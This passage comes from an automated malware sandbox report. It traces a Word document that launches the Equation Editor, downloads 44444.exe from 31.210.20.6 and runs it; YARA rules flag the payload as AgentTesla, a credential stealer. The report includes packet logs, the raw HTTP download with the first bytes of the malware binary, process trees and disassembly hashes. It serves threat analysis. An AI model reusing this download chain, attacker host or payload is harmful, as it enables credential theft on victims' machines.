May 4, 2021 22:01:56.754369974 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.755501986 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.755528927 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.755585909 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.756148100 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.756175041 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.756191969 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.756207943 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.756211042 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.756225109 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.756234884 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.756244898 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.756261110 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.756283045 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.757807970 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.759332895 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759360075 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759376049 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759392977 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759403944 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759423018 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759428024 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.759439945 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759453058 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.759455919 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759480000 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.759504080 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759504080 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.759521961 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759537935 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759550095 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.759553909 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759577036 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.759599924 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.759612083 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759660959 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.759664059 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759711027 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.759886026 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.759932995 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.760052919 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.760109901 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.760646105 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.762861967 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.762891054 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.762906075 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.762955904 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.762974024 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.764683962 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764709949 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764723063 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764738083 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764754057 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764767885 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764784098 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764800072 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764818907 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764837027 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764849901 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764866114 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764878988 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764889956 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764906883 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764910936 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.764918089 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764935017 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.764961958 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.764997005 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.765250921 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804052114 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804078102 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804094076 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804110050 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804127932 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804131985 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804146051 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804162979 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804164886 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804181099 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804197073 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804198980 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804213047 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804229975 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804234028 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804245949 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804265976 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804267883 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804284096 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804299116 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804301977 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804316044 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804331064 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804336071 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804347038 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804363012 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804374933 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804378033 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804408073 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804425001 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804426908 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804441929 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804456949 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804457903 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804472923 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804487944 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804490089 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804507971 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804519892 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804526091 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804542065 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804554939 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804558039 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804574966 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804588079 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804590940 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804606915 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804620981 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804641008 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804641962 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804650068 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804660082 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804688931 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804713011 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804718971 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.804785967 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.804959059 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.805007935 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.805077076 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.805123091 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.805182934 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.805398941 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.805401087 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.805443048 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:57.659974098 CEST	49167	80	192.168.2.22	31.210.20.6

HTTP Request Dependency Graph

31.210.20.6

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	31.210.20.6	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 4, 2021 22:01:56.453454018 CEST	0	OUT	GET /3/44444.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 31.210.20.6 Connection: Keep-Alive
May 4, 2021 22:01:56.505009890 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 04 May 2021 20:01:56 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Mon, 03 May 2021 22:54:49 GMT ETag: "53d38-5c174d9438040" Accept-Ranges: bytes Content-Length: 343352 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 80 90 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d2 04 00 00 4a 00 00 00 00 00 00 5e f0 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f0 04 00 4b 00 00 00 00 00 05 00 2c 47 00 00 00 00 00 00 00 00 00 00 00 1e 05 00 38 1f 00 00 00 60 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d0 04 00 00 20 00 00 00 d2 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 47 00 00 00 00 05 00 00 48 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 1c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f0 04 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 4a 00 00 24 2c 00 00 03 00 00 00 01 00 00 06 04 77 00 00 06 79 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 06 00 8c 00 00 00 00 00 00 00 1e 3a 05 00 00 00 dd 10 00 00 00 28 2f 00 00 06 38 f1 ff ff ff 26 dd 00 00 00 00 28 01 00 00 0a 14 fe 06 02 00 00 06 73 02 00 00 0a 6f 03 00 00 0a 20 b7 3e 6e 89 28 35 00 00 06 19 3a 36 00 00 00 26 20 81 3e 6e 89 28 35 00 00 06 17 8d 08 00 00 01 25 16 28 2d 00 00 06 a2 1a 3a 21 00 00 00 26 26 20 61 3e 6e 89 28 35 00 00 06 28 27 00 00 06 26 38 14 00 00 00 28 28 00 00 06 38 c1 ff ff ff 28 2a 00 00 06 38 d7 ff ff ff 2a 01 10 00 00 00 00 00 00 15 15 00 06 01 00 00 01 1b 30 04 00 dc 00 00 00 01 00 00 11 28 04 00 00 0a d0 02 00 00 02 28 05 00 00 0a 6f 06 00 00 0a 20 5e 3e 6e 89 28 35 00 00 06 28 07 00 00 0a 6f 08 00 00 0a 18 3a 06 00 00 00 26 38 06 00 00 00 0a 38 00 00 00 00 73 09 00 00 0a 1b 3a 1f 00 00 00 26 06 08 6f 0a 00 00 0a 08 6f 0b 00 00 0a 73 0c 00 00 0a 16 39 0c 00 00 00 26 38 0c 00 00 00 0c 38 dc ff ff ff 0d 38 00 00 00 00 73 09 00 00 0a 0b 09 16 73 0d 00 00 0a 73 0e 00 00 0a 13 04 11 04 07 6f 0a 00 00 0a dd 08 00 00 00 11 04 6f 0f 00 00 0a dc 07 6f 0b 00 00 0a 13 05 dd 07 00 00 00 07 6f 0f 00 00 0a dc dd 07 00 00 00 09 6f 0f 00 00 0a dc 28 01 00 00 0a 11 05 6f 10 00 00 0a 13 06 dd 0d 00 00 00 06 39 06 00 00 00 06 6f 0f 00 00 0a dc 11 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH`J^ @ @K,G8` H.textd `.rsrc,GH@@.reloc`@B@HJ$,wy0:(/8&(so >n(5:6& >n(5%(-:!&& a>n(5('&8((8(80((o ^>n(5(o:&88s:&oos9&888sssooooo(o9o
May 4, 2021 22:01:56.505034924 CEST	3	IN	Data Raw: 2a 01 34 00 00 02 00 84 00 0d 91 00 08 00 00 00 00 02 00 76 00 30 a6 00 07 00 00 00 00 02 00 70 00 42 b2 00 07 00 00 00 00 02 00 3a 00 92 cc 00 0d 00 00 00 00 6a 02 1e 1a 3a 0b 00 00 00 26 28 11 00 00 0a 38 06 00 00 00 26 38 f0 ff ff ff 2a 00 9a Data Ascii: 4v0pB:j:&(8&8s(t:&880~:&88(:&&(o:&&8}8}8*0A{
May 4, 2021 22:01:56.505050898 CEST	4	IN	Data Raw: 16 73 0f 00 00 06 19 3a 06 00 00 00 26 38 06 00 00 00 0a 38 00 00 00 00 06 2a 00 6a 02 19 15 3a 0b 00 00 00 26 28 15 00 00 06 38 06 00 00 00 26 38 f0 ff ff ff 2a 00 f6 02 28 13 00 00 0a 02 03 1c 3a 1a 00 00 00 26 26 02 28 14 00 00 0a 6f 15 00 00 Data Ascii: s:&88j:&(8&8(:&&(o:&&8}8}80A{:&;88@9&(8(-02{:&9%
May 4, 2021 22:01:56.505068064 CEST	6	IN	Data Raw: 18 00 00 04 7b 29 00 00 0a 7e 18 00 00 04 11 06 11 07 11 08 20 8b 3f 6e 89 28 35 00 00 06 6f 2a 00 00 0a 1f 1c 28 2b 00 00 0a 20 97 3f 6e 89 28 35 00 00 06 28 2c 00 00 0a 0b 07 28 2d 00 00 0a 16 fe 01 13 09 11 09 39 07 00 00 00 07 28 2e 00 00 0a Data Ascii: {)~ ?n(5o(+ ?n(5(,(-9(.& i?n(5 G?n(5(/(0(,(19(2s38(4s3 T?n(5 ??n(5(/(5~o6~o7(80
May 4, 2021 22:01:56.505085945 CEST	7	IN	Data Raw: 66 65 61 0a 11 08 3a 06 00 00 00 14 38 07 00 00 00 11 08 6f 55 00 00 0a 13 07 11 07 d0 4b 00 00 01 28 05 00 00 0a 40 1f 00 00 00 7e 21 00 00 04 1a 60 80 21 00 00 04 06 20 6e e1 95 bc 08 58 09 61 07 58 61 0a 38 88 00 00 00 11 07 3a 5d 00 00 00 11 Data Ascii: fea:8oUK(@~!`! nXaXa8:](99) iCYXfeffefefeYa~!`!8J~!`! N3aaffeeffefea8$ W/XXfefeffeefYa~!`!~ X *0d~":
May 4, 2021 22:01:56.505105019 CEST	8	IN	Data Raw: 32 7d 13 00 00 04 6f 16 00 00 0a 13 17 38 1e 00 00 00 11 17 6f 17 00 00 0a 13 2b 11 0d 11 2b 11 20 59 61 13 0d 11 20 11 0d 19 58 1e 63 59 13 20 11 17 6f 23 00 00 06 3a d6 ff ff ff dd 0f 00 00 00 11 17 39 07 00 00 00 11 17 6f 22 00 00 06 dc 11 0d Data Ascii: 2}o8o++ Ya XcY o#:9o"44 ]~OXXY TYaa0 -_XXfeffeefefa0X~ rVaY_ ~YYaa~! -raXfefefeffe_: YYY8~~ aX@4
May 4, 2021 22:01:56.505120039 CEST	10	IN	Data Raw: 00 00 00 12 00 00 11 02 6f 65 00 00 0a 1a 3a 06 00 00 00 26 dd 24 00 00 00 0a 38 f5 ff ff ff 26 02 6f 66 00 00 0a 73 67 00 00 0a 17 3a 06 00 00 00 26 dd 06 00 00 00 0a 38 f5 ff ff ff 06 2a 01 10 00 00 00 00 00 00 18 18 00 1e 01 00 00 01 13 30 03 Data Ascii: oe:&$8&ofsg:&80:oh:&9%88::&880X%:&oR:&:8888*oT%:&8oU
May 4, 2021 22:01:56.505137920 CEST	11	IN	Data Raw: 00 00 02 28 05 00 00 0a 6f 69 00 00 0a 40 0a 00 00 00 28 45 00 00 06 3a 03 00 00 00 16 6a 2a 7e 28 00 00 04 25 18 3a 0d 00 00 00 26 1d 3a 0d 00 00 00 26 38 11 00 00 00 13 0b 38 ed ff ff ff 28 56 00 00 0a 38 00 00 00 00 7e 28 00 00 04 6f 49 00 00 Data Ascii: (oi@(E:j*~(%:&:&88(V8~(oI:&j@u88(:&so9&888oe&ofsgoh9i:9op(_oqorop
May 4, 2021 22:01:56.505156994 CEST	13	IN	Data Raw: 22 00 00 00 26 16 13 05 38 55 00 00 00 0a 38 76 ff ff ff 13 06 38 ce ff ff ff 0b 38 d1 ff ff ff 0c 38 d7 ff ff ff 0d 38 d9 ff ff ff 07 08 1a 62 08 1b 63 61 08 58 09 06 09 19 5f 94 58 61 58 0b 09 11 06 58 0d 08 07 1a 62 07 1b 63 61 07 58 09 06 09 Data Ascii: "&8U8v8888bcaX_XaXXbcaXc_XaXX @8X@})}*9&:& b8fefefeffeYa8&8&80G:2& ffeeffeefe
May 4, 2021 22:01:56.505175114 CEST	14	IN	Data Raw: 00 01 00 00 00 00 00 06 00 2f 00 36 00 0a 00 67 00 7f 00 06 00 2f 02 36 00 06 00 f8 02 36 00 06 00 fd 02 36 00 06 00 19 03 36 00 06 00 33 03 36 00 06 00 4e 03 36 00 06 00 63 03 6c 03 06 00 80 03 36 00 06 00 98 03 9f 03 06 00 a9 03 9f 03 06 00 b6 Data Ascii: /6g/666636N6cl6666FQgQw66#666#7f66
May 4, 2021 22:01:56.555527925 CEST	16	IN	Data Raw: 20 00 00 00 00 91 00 eb 02 0a 00 01 00 f8 20 00 00 00 00 91 00 55 03 1f 00 01 00 14 22 00 00 00 00 86 18 2d 03 54 00 03 00 30 22 00 00 00 00 91 18 92 04 0a 00 03 00 58 22 00 00 00 00 96 00 90 04 83 00 03 00 80 22 00 00 00 00 86 18 2d 03 97 00 03 Data Ascii: U"-T0"X""-"ZT #f$T$Z$T$Z$Zx%Z%-%T%f&

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2464 Parent PID: 584

General

Start time:	22:01:37
Start date:	04/05/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f910000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2564 Parent PID: 584

General

Start time:	22:01:57
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: tthxx.exe PID: 2928 Parent PID: 2564

General

Start time:	22:01:58
Start date:	04/05/2021
Path:	C:\Users\user\tthxx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\tthxx.exe
Imagebase:	0x940000
File size:	343352 bytes
MD5 hash:	CCE6C363C0FF7AC663CD71C5906069A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 40%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3028 Parent PID: 584

General

Start time:	22:01:59
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2452 Parent PID: 584

General

Start time:	22:02:05
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: tthxx.exe PID: 2880 Parent PID: 2452

General

Start time:	22:02:06
Start date:	04/05/2021
Path:	C:\Users\user\tthxx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\tthxx.exe
Imagebase:	0x940000
File size:	343352 bytes
MD5 hash:	CCE6C363C0FF7AC663CD71C5906069A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2140 Parent PID: 584

General

Start time:	22:02:07
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2196 Parent PID: 584

General

Start time:	22:02:07
Start date:	04/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: tthxx.exe PID: 2312 Parent PID: 2928

General

Start time:	22:02:51
Start date:	04/05/2021
Path:	C:\Users\user\AppData\Local\Temp\tthxx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\tthxx.exe
Imagebase:	0x130000
File size:	343352 bytes
MD5 hash:	CCE6C363C0FF7AC663CD71C5906069A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 40%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: tthxx.exe PID: 2928 Parent PID: 2564 tthxx.exeCOMMON

Executed Functions

Function 001E7098, Relevance: 3.2, Strings: 2, Instructions: 670COMMON

Download Yara Rule

Strings

TV>m, xrefs: 001E73D8
TV>m, xrefs: 001E7121

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: TV>m$TV>m
API String ID: 0-2081520053
Opcode ID: bddaf96f693168e5f032554c293462e824818fe1fd0b83d79ed4e8c37083f43e
Instruction ID: 42a3edc21af7c6706dd1db504028f366c9af39c92a0326e6d00c154af01a9c0b
Opcode Fuzzy Hash: bddaf96f693168e5f032554c293462e824818fe1fd0b83d79ed4e8c37083f43e
Instruction Fuzzy Hash: 8E523735A005149FDB09DFA9D984E6CBBB2FF49304F1685A8E50A9B2B2CB31EC51DF50

Uniqueness

Uniqueness Score: -1.00%

Function 001E55E0, Relevance: 2.8, Strings: 2, Instructions: 281COMMON

Download Yara Rule

Strings

J-p, xrefs: 001E5738
,G-p, xrefs: 001E5897

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: ,G-p$J-p
API String ID: 0-3905215198
Opcode ID: 277985450cf36ad8c5806b0ac0198b96ab1497b8d708d8a3b83595d050ef9046
Instruction ID: fc2ee9482fd976a1c94d8675a6a0527ca80886245a4724f9d0d1808f64160917
Opcode Fuzzy Hash: 277985450cf36ad8c5806b0ac0198b96ab1497b8d708d8a3b83595d050ef9046
Instruction Fuzzy Hash: BFB14F70E04A49CFDF14CFAAC8857EEBBF2AF88318F148529D815E7254EB749851CB91

Uniqueness

